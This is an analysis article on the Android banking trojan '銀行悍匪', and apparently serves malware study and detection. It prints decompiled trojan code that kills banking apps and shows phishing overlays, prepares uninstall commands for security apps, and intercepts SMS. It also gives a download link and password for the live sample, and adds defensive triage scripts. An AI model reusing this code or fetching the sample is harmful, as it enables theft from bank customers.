
Exclusive analysis of the Android trojan "銀行悍匪" ("Bank Bandit")

Source: 西西教程網   Date: 2014/3/24 9:14:21

Author: 西西小熊   Tags: 銀行悍匪

1. Basic information about the sample

FileName: b5910a432d2b866e1028f31874edb32f.apk
File MD5: b5910a432d2b866e1028f31874edb32f
SHA1: 0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1
File Size: 829006 bytes
Package: langthing.nend
Download: http://yunpan.cn/Q4qHuRLaNivtd    access code: 3a90    archive password: 52pojie

// Summary: the trojan first poses as a system component (by registering itself as a device administrator) so that it cannot be uninstalled normally; it then tries to uninstall security software; it watches for a list of banking apps; the keywords that decide which SMS messages get intercepted are stored encrypted, which makes analysis harder; and it declares no MAIN/LAUNCHER component, so no icon appears after installation and the user has little reason to notice it.

2. Code analysis

AndroidManifest.xml shows that the trojan requests a large number of high-risk permissions: sending SMS, placing calls, reading the system logs, killing other apps' processes, and so on. No activity carries a MAIN/LAUNCHER intent filter, so the app has no icon.

<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission android:name="android.permission.RECEIVE_SMS" />            // receive SMS
    <uses-permission android:name="android.permission.SEND_SMS" />               // send SMS
    <uses-permission android:name="android.permission.READ_SMS" />               // read SMS
    <uses-permission android:name="android.permission.WRITE_SMS" />              // edit/delete SMS
    <uses-permission android:name="android.permission.SEND_SMS" />               // (declared a second time in the manifest)
    <uses-permission android:name="android.permission.READ_CONTACTS" />          // read the address book
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />         // modify system settings
    <uses-permission android:name="android.permission.READ_LOGS" />              // read system logs (third-party apps lost this on Android 4.1 and later)
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />         // edit contacts
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />       // phone state, IMEI, phone number
    <uses-permission android:name="android.permission.CALL_PHONE" />             // place calls
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> // start at boot
    <uses-permission android:name="android.permission.GET_TASKS" />              // enumerate running tasks (which app is in the foreground)
    <uses-permission android:name="android.permission.RESTART_PACKAGES" />       // kill other apps' background processes

The manifest also declares several broadcast receivers that start the trojan without any user interaction: TReceiver on BOOT_COMPLETED (with the maximum possible priority), deviceAdminReceiver on DEVICE_ADMIN_ENABLED, Alarmreceiver on a custom action arui.alarm.action (presumably fired by an AlarmManager timer), and ShutdownReceiver on ACTION_SHUTDOWN.

        <receiver android:name=".TReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".Alarmreceiver">
            <intent-filter>
                <action android:name="arui.alarm.action" />
            </intent-filter>
        </receiver>
        <receiver android:name=".ShutdownReceiver">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_SHUTDOWN" />
            </intent-filter>
        </receiver>
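The manifest traits above (no launcher activity, the full SMS permission cluster, GET_TASKS plus RESTART_PACKAGES, a BOOT_COMPLETED receiver with priority 2147483647, a DeviceAdminReceiver) are exactly what a static triage pass should flag. The script below is an added example, not code from the original analysis or from the trojan: it parses a manifest with the standard library and returns the findings as rule ids. SAMPLE_MANIFEST is constructed from the fragments quoted above; the activity ".main" without any intent filter is an assumption (the page only states that MAIN/LAUNCHER is absent), and the rule names are this example's own.

```python
"""Static AndroidManifest.xml triage for the traits shown by the 銀行悍匪 sample (added example)."""
import xml.etree.ElementTree as ET

NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % NS
A_PRIORITY = "{%s}priority" % NS
A_PERMISSION = "{%s}permission" % NS

MAIN = "android.intent.action.MAIN"
LAUNCHER = "android.intent.category.LAUNCHER"
BOOT = "android.intent.action.BOOT_COMPLETED"
BIND_DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"

SMS_CLUSTER = {"android.permission.%s" % p for p in ("RECEIVE_SMS", "READ_SMS", "SEND_SMS", "WRITE_SMS")}
TASK_KILL_CLUSTER = {"android.permission.GET_TASKS", "android.permission.RESTART_PACKAGES"}

# Constructed from the manifest fragments quoted in the analysis; ".main" without a launcher filter is assumed.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="langthing.nend" android:versionCode="1" android:versionName="1.1">
  <uses-permission android:name="android.permission.RECEIVE_SMS" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <uses-permission android:name="android.permission.READ_SMS" />
  <uses-permission android:name="android.permission.WRITE_SMS" />
  <uses-permission android:name="android.permission.READ_CONTACTS" />
  <uses-permission android:name="android.permission.WRITE_SETTINGS" />
  <uses-permission android:name="android.permission.READ_LOGS" />
  <uses-permission android:name="android.permission.WRITE_CONTACTS" />
  <uses-permission android:name="android.permission.READ_PHONE_STATE" />
  <uses-permission android:name="android.permission.CALL_PHONE" />
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
  <uses-permission android:name="android.permission.GET_TASKS" />
  <uses-permission android:name="android.permission.RESTART_PACKAGES" />
  <application>
    <activity android:name=".main" />
    <receiver android:name=".TReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.intent.action.BOOT_COMPLETED" />
      </intent-filter>
    </receiver>
    <receiver android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /></intent-filter>
    </receiver>
    <receiver android:name=".Alarmreceiver">
      <intent-filter><action android:name="arui.alarm.action" /></intent-filter>
    </receiver>
    <receiver android:name=".ShutdownReceiver">
      <intent-filter><action android:name="android.intent.action.ACTION_SHUTDOWN" /></intent-filter>
    </receiver>
  </application>
</manifest>"""


def _filters(component):
    """Yield (actions, categories, priority) for each <intent-filter> of a component."""
    for f in component.findall("intent-filter"):
        actions = {a.get(A_NAME) for a in f.findall("action")}
        categories = {c.get(A_NAME) for c in f.findall("category")}
        yield actions, categories, int(f.get(A_PRIORITY, "0"))


def triage(manifest_xml):
    """Return the package name, its permissions, and a dict of rule id -> finding text."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(A_NAME) for p in root.iter("uses-permission")}
    findings = {}

    # 1. No launcher entry point: the app installs without an icon.
    has_launcher = any(MAIN in acts and LAUNCHER in cats
                       for act in root.iter("activity")
                       for acts, cats, _ in _filters(act))
    if not has_launcher:
        findings["hidden_no_launcher"] = "no activity with MAIN + LAUNCHER intent filter"

    # 2. Full control over SMS: receive, read, write and send.
    if SMS_CLUSTER <= perms:
        findings["sms_full_control"] = "RECEIVE/READ/WRITE/SEND_SMS all requested"

    # 3. Foreground-app monitoring combined with the ability to kill other apps (overlay pattern).
    if TASK_KILL_CLUSTER <= perms:
        findings["task_monitor_kill"] = "GET_TASKS + RESTART_PACKAGES"

    for perm, rule in (("android.permission.CALL_PHONE", "call_phone"),
                       ("android.permission.READ_LOGS", "read_logs")):
        if perm in perms:
            findings[rule] = perm

    # 4. Receivers: boot persistence with an inflated priority, and a device-admin hook.
    for r in root.iter("receiver"):
        if r.get(A_PERMISSION) == BIND_DEVICE_ADMIN:
            findings["device_admin"] = "declares a DeviceAdminReceiver (%s)" % r.get(A_NAME)
        for acts, _, prio in _filters(r):
            if BOOT in acts and prio >= 1000:
                findings["boot_high_priority"] = "BOOT_COMPLETED receiver with priority %d" % prio

    return {"package": root.get("package"), "permissions": sorted(perms), "findings": findings}


if __name__ == "__main__":
    report = triage(SAMPLE_MANIFEST)
    print(report["package"], "-", len(report["permissions"]), "permissions")
    for rule, detail in report["findings"].items():
        print("  [%s] %s" % (rule, detail))
```

Run it against a manifest pulled with apktool (or the output of aapt dump xmltree, converted back to XML) and the findings dict is the triage summary; on this sample all seven rules fire, while a normal app with a launcher activity and no SMS permissions produces none.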

The class tree of the malicious code is as follows (figure not preserved in this copy).

Once installed, the app presents itself as a system component so that it cannot be uninstalled in the normal way (screenshot not preserved).

The code in langthing.nend.main that does this is b(): it opens the system's ADD_DEVICE_ADMIN activation dialog for the trojan's own deviceAdminReceiver, with the explanation text "------ android ------" so the prompt looks like a system request.

private void b()
{
  Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
  localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);                // this.c: ComponentName of .deviceAdminReceiver
  localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------");  // text shown in the activation dialog, made to look like a system prompt
  startActivityForResult(localIntent, 1);
}

Once the user taps "Activate", the package can no longer be uninstalled until the administrator is deactivated under Settings > Security > Device administrators; on Android 7.0 and later it can also be removed from a shell with adb shell dpm remove-active-admin langthing.nend/.deviceAdminReceiver, after which adb uninstall langthing.nend works again.

當(dāng)應(yīng)用監(jiān)測(cè)到銀行客戶端啟動(dòng)時(shí),就會(huì)終止個(gè)銀行進(jìn)程,并為工商銀行、淘寶等定制了高仿真“釣魚界面”

private void e()
{
    // p is the ActivityManager cached in the service's onCreate(); the top activity of the most recent task is the foreground app
    ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;
    ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");
    String str = localComponentName.getClassName();
    // one of the trojan's own phishing activities is on top: kill every known banking app behind it
    if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
    {
      if (a(getApplicationContext(), "com.icbc"))
        localActivityManager.restartPackage("com.icbc");
      if (a(getApplicationContext(), "com.chinamworld.main"))
        localActivityManager.restartPackage("com.chinamworld.main");
      if (a(getApplicationContext(), "com.bankcomm"))
        localActivityManager.restartPackage("com.bankcomm");
      if (a(getApplicationContext(), "com.taobao.taobao"))
        localActivityManager.restartPackage("com.taobao.taobao");
      if (a(getApplicationContext(), "com.android.bankabc"))
        localActivityManager.restartPackage("com.android.bankabc");
      if (a(getApplicationContext(), "cmb.pb"))
        localActivityManager.restartPackage("cmb.pb");
      if (a(getApplicationContext(), "com.rytong.bankgdb"))
        localActivityManager.restartPackage("com.rytong.bankgdb");
      if (a(getApplicationContext(), "com.cib.bankcib"))
        localActivityManager.restartPackage("com.cib.bankcib");
      if (a(getApplicationContext(), "com.rytong.bankps"))
        localActivityManager.restartPackage("com.rytong.bankps");
      if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))
        localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");
      if (a(getApplicationContext(), "com.ecitic.bank.mobile"))
        localActivityManager.restartPackage("com.ecitic.bank.mobile");
      if (a(getApplicationContext(), "com.cebbank.bankebb"))
        localActivityManager.restartPackage("com.cebbank.bankebb");
      if (a(getApplicationContext(), "cn.com.cmbc.mbank"))
        localActivityManager.restartPackage("cn.com.cmbc.mbank");
      if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");
      if (a(getApplicationContext(), "com.pingan.pabank.activity"))
        localActivityManager.restartPackage("com.pingan.pabank.activity");
      if (a(getApplicationContext(), "com.gzrcb.mobilebank"))
        localActivityManager.restartPackage("com.gzrcb.mobilebank");
      if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.bocmbci"))
        localActivityManager.restartPackage("com.chinamworld.bocmbci");
      if (a(getApplicationContext(), "com.rytong.app.bankhx"))
        localActivityManager.restartPackage("com.rytong.app.bankhx");
      if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))
        localActivityManager.restartPackage("com.csii.huzhou.mobilebank");
      if (a(getApplicationContext(), "cn.com.shbank.mper"))
        localActivityManager.restartPackage("cn.com.shbank.mper");
      if (a(getApplicationContext(), "com.rytong.bankqd"))
        localActivityManager.restartPackage("com.rytong.bankqd");
      if (a(getApplicationContext(), "com.tlbank"))
        localActivityManager.restartPackage("com.tlbank");
      if (a(getApplicationContext(), "com.sookin.scyh"))
        localActivityManager.restartPackage("com.sookin.scyh");
      if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.klb"))
        localActivityManager.restartPackage("com.chinamworld.klb");
    }
    // ICBC in the foreground: look up the "gs" row of the yh table; only act while its jilu flag is still 0
    if (str.contains("icbc"))
    {
      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.icbc");
        new Intent("android.intent.action.MAIN");                 // dead statement left by the decompiler
        Intent localIntent53 = new Intent("android.intent.action.MAIN");
        localIntent53.setFlags(268435456);                        // FLAG_ACTIVITY_NEW_TASK
        localIntent53.addCategory("android.intent.category.HOME");
        startActivity(localIntent53);                             // send the real app to the background
        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
        localIntent54.setFlags(268435456);
        startActivity(localIntent54);                             // show the ICBC phishing screen
      }
    }
    // China Construction Bank (com.chinamworld.main): same pattern, code "js", overlay class js
    if (str.contains("com.chinamworld.main"))
    {
      Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);
      if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.chinamworld.main");
        new Intent("android.intent.action.MAIN");
        Intent localIntent51 = new Intent("android.intent.action.MAIN");
        localIntent51.setFlags(268435456);
        localIntent51.addCategory("android.intent.category.HOME");
        startActivity(localIntent51);
        Intent localIntent52 = new Intent(getApplicationContext(), js.class);
        localIntent52.setFlags(268435456);
        startActivity(localIntent52);
      }
    }
    // Bank of Communications (com.bankcomm): code "jt", overlay class jt
    if (str.contains("bankcomm"))
    {
      Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);
      if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.bankcomm");
        new Intent("android.intent.action.MAIN");
        Intent localIntent49 = new Intent("android.intent.action.MAIN");
        localIntent49.setFlags(268435456);
        localIntent49.addCategory("android.intent.category.HOME");
        startActivity(localIntent49);
        Intent localIntent50 = new Intent(getApplicationContext(), jt.class);
        localIntent50.setFlags(268435456);
        startActivity(localIntent50);
      }
    }
    // Taobao: code "tb", overlay class tb
    if (str.contains("taobao"))
    {
      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.taobao.taobao");
        new Intent("android.intent.action.MAIN");
        Intent localIntent47 = new Intent("android.intent.action.MAIN");
        localIntent47.setFlags(268435456);
        localIntent47.addCategory("android.intent.category.HOME");
        startActivity(localIntent47);
        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
        localIntent48.setFlags(268435456);
        startActivity(localIntent48);
      }
    // (remaining branches of e() omitted in the original)

//  kills the banking apps' processes and replaces them with the phishing screens
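The target list in e() is the most useful indicator set on this page, and pulling it out of decompiled text by hand is error-prone. The script below is an added example, not part of the original analysis: it runs three regular expressions over decompiled source in the shape shown above and recovers the killed packages, the trojan's own overlay class names, and the per-bank table (trigger substring, yh code, killed package, phishing activity). DECOMPILED_EXCERPT is a constructed excerpt covering three of the 26 killed packages and two overlay branches; running the same functions over the full decompiled class yields the complete list.

```python
"""Recover the overlay trojan's targeting table from decompiled Java text (added example)."""
import re

# Constructed excerpt in the shape of the decompiled e() method quoted above (not the full method).
DECOMPILED_EXCERPT = r'''
    String str = localComponentName.getClassName();
    if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
    {
      if (a(getApplicationContext(), "com.icbc"))
        localActivityManager.restartPackage("com.icbc");
      if (a(getApplicationContext(), "com.chinamworld.main"))
        localActivityManager.restartPackage("com.chinamworld.main");
      if (a(getApplicationContext(), "com.taobao.taobao"))
        localActivityManager.restartPackage("com.taobao.taobao");
    }
    if (str.contains("icbc"))
    {
      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.icbc");
        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
        localIntent54.setFlags(268435456);
        startActivity(localIntent54);
      }
    }
    if (str.contains("taobao"))
    {
      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.taobao.taobao");
        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
        localIntent48.setFlags(268435456);
        startActivity(localIntent48);
      }
    }
'''

# One per-bank branch: `if (str.contains("<trigger>"))`, str being the foreground activity class name.
TRIGGER_RE = re.compile(r'if \(str\.contains\("([^"]+)"\)\)')
# The compound condition matches the trojan's own overlay classes ("gs.gs", "js.js", ...).
SELF_RE = re.compile(r'\(str\.contains\("(\w+)\.(\w+)"\)\)')
KILL_RE = re.compile(r'restartPackage\("([^"]+)"\)')
PHISH_RE = re.compile(r'new Intent\(getApplicationContext\(\),\s*(\w+)\.class\)')
# The yh-table lookup: c.a("yh", ..., "mc=?", new String[] { "<code>" }, ...)
BANK_CODE_RE = re.compile(r'"mc=\?",\s*new String\[\]\s*\{\s*"(\w+)"\s*\}')


def killed_packages(src):
    """Every package name passed to ActivityManager.restartPackage(), deduplicated and sorted."""
    return sorted(set(KILL_RE.findall(src)))


def own_overlay_classes(src):
    """Short names the trojan recognises as its own phishing screens (package.class with equal halves)."""
    return sorted({a for a, b in SELF_RE.findall(src) if a == b})


def overlay_table(src):
    """trigger substring -> (yh code, killed package, phishing activity class) for each per-bank branch."""
    table = {}
    hits = list(TRIGGER_RE.finditer(src))
    for i, m in enumerate(hits):
        # a branch runs from its `if` to the next per-bank `if` (or the end of the text)
        end = hits[i + 1].start() if i + 1 < len(hits) else len(src)
        block = src[m.end():end]
        code = BANK_CODE_RE.search(block)
        kill = KILL_RE.search(block)
        phish = PHISH_RE.search(block)
        table[m.group(1)] = (code.group(1) if code else None,
                             kill.group(1) if kill else None,
                             phish.group(1) if phish else None)
    return table


if __name__ == "__main__":
    print("killed packages:", killed_packages(DECOMPILED_EXCERPT))
    print("own overlay classes:", own_overlay_classes(DECOMPILED_EXCERPT))
    for trigger, row in overlay_table(DECOMPILED_EXCERPT).items():
        print("  foreground class contains %-8s -> code=%s kill=%s overlay=%s" % ((trigger,) + row))
```

The killed-package list doubles as a detection artefact: a third-party APK whose dex strings contain a dozen or more Chinese mobile-banking package names next to "restartPackage" and "getRunningTasks" is worth a closer look on its own.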

Finding and uninstalling security software. The service checks whether the device is rooted (the decompiled for-loop below is the decompiler's rendering of that check: g ends up as "Already root" or "NOroot") and prepares pm uninstall commands, to be run through a root shell, for five Chinese mobile security products: 360 Mobile Safe, Tencent Mobile Manager, Kingsoft Mobile Guard, Kingsoft Duba and Anguanjia. Without root the commands cannot succeed, since pm uninstall of another package needs the shell or root uid.

for (g = "Already root"; ; g = "NOroot")          // decompiler artefact: g records the result of the root check
{
  this.C = 5;
  this.E = 5;
  this.B = new String[this.C];                     // shell commands to run as root
  this.D = new String[this.E];                     // package names of the same five products
  this.B[0] = "pm uninstall com.qihoo360.mobilesafe";   // 360 Mobile Safe
  this.B[1] = "pm uninstall com.tencent.qqpimsecure";   // Tencent Mobile Manager
  this.B[2] = "pm uninstall com.ijinshan.mguard";       // Kingsoft Mobile Guard
  this.B[3] = "pm uninstall com.ijinshan.duba";         // Kingsoft Duba
  this.B[4] = "pm uninstall com.anguanjia.safe";        // Anguanjia
  this.D[0] = "com.qihoo360.mobilesafe";
  this.D[1] = "com.tencent.qqpimsecure";
  this.D[2] = "com.ijinshan.mguard";
  this.D[3] = "com.ijinshan.duba";
  this.D[4] = "com.anguanjia.safe";
  this.s = new o();

Intercepting SMS. The service registers a ContentObserver on content://sms/ (see its onCreate() further down); the observer's onChange() reads the newest row of the SMS provider and handles it according to its type column. The decompiled control flow (goto-style while/break blocks) looks like this:

// fragment of m.onChange(boolean); i3 = _id and i5 = type of the newest row (1 = inbox, 2 = sent),
// str1/str2/str3 and i4 are its remaining columns, localStringBuilder is a debug log
        if (i5 == 1)                                       // incoming message
          if ((server.f == 0) && (server.a != i3))         // not busy, and this _id not yet handled
          {
            server.a(this.a, 1);                           // server.f = 1 (busy)
            server.b(this.a, i3);                          // server.a = i3 (remember this _id)
            str4 = "received";
            server.a(this.a, new o());
            String str5 = server.d(this.a).a(this.a.getApplicationContext());
            server.a(this.a, new n());
            server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);   // hand the message to the upload/keyword logic
            localStringBuilder.append("[ ");
            localStringBuilder.append(str1 + ", ");
            localStringBuilder.append(i4 + ", ");
            localStringBuilder.append(str2 + ", ");
            localStringBuilder.append(str3 + ", ");
            localStringBuilder.append(str4);
            localStringBuilder.append(" ]\n\n");
            if (!localCursor1.isClosed())
              localCursor1.close();
          }
      }
      while (true)
      {
        localStringBuilder.append("getSmsInPhone has executed!");
        super.onChange(paramBoolean);
        return;
        server.f = 0;                                      // clear the busy flag
        break;
        if (i5 != 2)                                       // neither inbox nor sent: nothing to do
          break;
        if (server.b == i3)                                // this sent _id already handled
          break label760;
        Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");   // walk the "send" table of unhi.db
        if (localCursor2.moveToFirst())
        {
          localCursor2.getColumnIndex("_id");
          int i6 = localCursor2.getColumnIndex("sSend");
          do
            server.a(this.a, localCursor2.getString(i6));
          while (localCursor2.moveToNext());
        }
        localCursor2.close();
        if (server.h(this.a).equals("1"))                  // configuration flag: also report outgoing messages
        {
          server.a(this.a, new o());
          server.a(this.a, new n());
          String str6 = server.d(this.a).a(this.a.getApplicationContext());
          server.a(this.a, str2 + ";" + str1, str6);       // upload "body;address" (or "address;body")
        }
        server.b = i3;                                     // remember this sent _id
        str4 = "sent";
        break;
        localStringBuilder.append("no result!");
      }
    }
    catch (SQLiteException localSQLiteException)
    {
      while (true)
      {
        continue;
        label760: String str4 = "null";
      }
    }
  }
}
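The decompiler output above hides a simple state machine: two "last handled _id" fields (server.a for the inbox, server.b for sent messages), a busy flag (server.f), and one configuration flag (server.h) that decides whether outgoing SMS are reported too. The model below is an added example, not the trojan's code: it restates that flow in plain control structure so the deduplication and type handling can be read and tested. Rows are constructed dicts shaped like content://sms/ (_id, type, address, body) and the upload step is replaced by appending to a list. The labels "received", "sent" and "null" are the page's own strings (接收 / 發送 / null); "skipped" and "no result" are the model's. The loop over the send table is left out because the page does not show what server.a(Context, String) does with those rows, and the reading of the mangled control flow is this example's own.

```python
"""Plain-control-flow model of the SMS ContentObserver logic decompiled above (added example)."""

INBOX, SENT = 1, 2   # Telephony.Sms.MESSAGE_TYPE_INBOX / MESSAGE_TYPE_SENT (the `type` column)


class SmsObserverModel:
    def __init__(self, forward_sent=False):
        self.last_inbox_id = -1            # server.a: last inbox _id already handled
        self.last_sent_id = -1             # server.b: last sent _id already handled
        self.busy = 0                      # server.f: 1 while an inbox message is being processed
        self.forward_sent = forward_sent   # server.h(...) == "1": also report outgoing SMS
        self.uploaded = []                 # stand-in for what the real code hands to its upload routine

    def on_change(self, newest):
        """Called once per change of content://sms/ with the newest row (or None); returns the log label."""
        if newest is None:
            return "no result"
        sms_id, kind = newest["_id"], newest["type"]
        if kind == INBOX:
            # the observer fires more than once per insert; the (busy, last _id) pair suppresses repeats
            if self.busy == 0 and self.last_inbox_id != sms_id:
                self.busy = 1
                self.last_inbox_id = sms_id
                self.uploaded.append(("recv", newest["address"], newest["body"]))
                self.busy = 0
                return "received"
            return "skipped"
        if kind == SENT:
            if self.last_sent_id == sms_id:
                return "null"                       # label760 in the decompiled code
            if self.forward_sent:
                self.uploaded.append(("sent", newest["address"], newest["body"]))
            self.last_sent_id = sms_id
            return "sent"
        return "no result"                          # drafts, outbox, failed: ignored


def replay(snapshots, forward_sent=False):
    """Feed a sequence of 'newest row' snapshots through the model; return (labels, uploads)."""
    model = SmsObserverModel(forward_sent)
    labels = [model.on_change(row) for row in snapshots]
    return labels, model.uploaded


# Constructed snapshots: a bank OTP arrives (the observer fires twice for the same row, as it does
# in practice), then the user sends a reply (again seen twice).
SNAPSHOTS = [
    {"_id": 10, "type": INBOX, "address": "95588", "body": "[constructed] verification code 123456"},
    {"_id": 10, "type": INBOX, "address": "95588", "body": "[constructed] verification code 123456"},
    {"_id": 11, "type": SENT,  "address": "95588", "body": "[constructed] reply"},
    {"_id": 11, "type": SENT,  "address": "95588", "body": "[constructed] reply"},
]

if __name__ == "__main__":
    for flag in (False, True):
        labels, uploads = replay(SNAPSHOTS, forward_sent=flag)
        print("forward_sent=%s labels=%s uploaded=%d" % (flag, labels, len(uploads)))
```

The point of the dedup fields is operational rather than clever: without them every observer callback would re-upload the same OTP, and the duplicate traffic would be the easiest way to spot the implant on the network side.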

The "decryption key". What the author calls the key is unhi.db, a SQLite database shipped in the APK's assets. a() copies it into the app's private files directory, and the service then opens it through a SQLiteOpenHelper-style wrapper (class a, constructed with context, path, null factory and version 1); the yh and send tables used above live in it, and the keyword tables it holds are stored encrypted, which is the part the author could not decrypt.

public void a()
  {
    try
    {
      InputStream localInputStream = getAssets().open("unhi.db");     // the bundled database the author refers to as the key
      FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");   // this.q = <files dir>/
      byte[] arrayOfByte = new byte[1024];
      while (true)
      {
        int i1 = localInputStream.read(arrayOfByte);
        if (i1 <= 0)
        {
          localFileOutputStream.flush();
          localFileOutputStream.close();
          localInputStream.close();
          return;
        }
        localFileOutputStream.write(arrayOfByte, 0, i1);
      }
    }
    catch (Exception localException)
    {
    }
  }

  public void a(String paramString)
  {
    if (!new File(paramString).exists())      // copy the database out of assets only on first run
      a();
  }

  public void c()
  {
    new l(this).start();                      // worker thread (class l)
  }

  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }

  public void onCreate()
  {
    this.u = new e();
    IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    localIntentFilter.setPriority(2147483647);  // highest priority, to see (and on old releases abort) SMS_RECEIVED first;
                                                // from Android 4.4 this broadcast can no longer be aborted and only the
                                                // default SMS app receives SMS_DELIVER, so the priority matters only on older releases
    registerReceiver(this.u, localIntentFilter);
    p = (ActivityManager)getSystemService("activity");   // the static ActivityManager used by e()
    this.F = 0;
    this.j = false;
    // check-in: root status (g), Android version and model; the destination comes from this.s.a(), which the page does not show
    b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);
    this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");
    a(this.q + "unhi.db");
    c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);   // open the copied database
    m localm = new m(this, new Handler());
    getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);       // the SMS observer shown above
    Intent localIntent = new Intent(getApplicationContext(), log.class);
    localIntent.setFlags(268435456);
    startService(localIntent);                                                                     // second service, class log
    // (rest of onCreate() omitted in the original)


 

3. Summary

The trojan tries to uninstall security software, uses encryption to slow down analysis, and hides its user interface so that the victim does not notice it. Mobile threats are clearly getting worse and their techniques more sophisticated, which makes analysis harder.

// Since my own knowledge of cryptography is not even at the Hello World level, I was unable to decrypt the relevant data; my skills are limited.
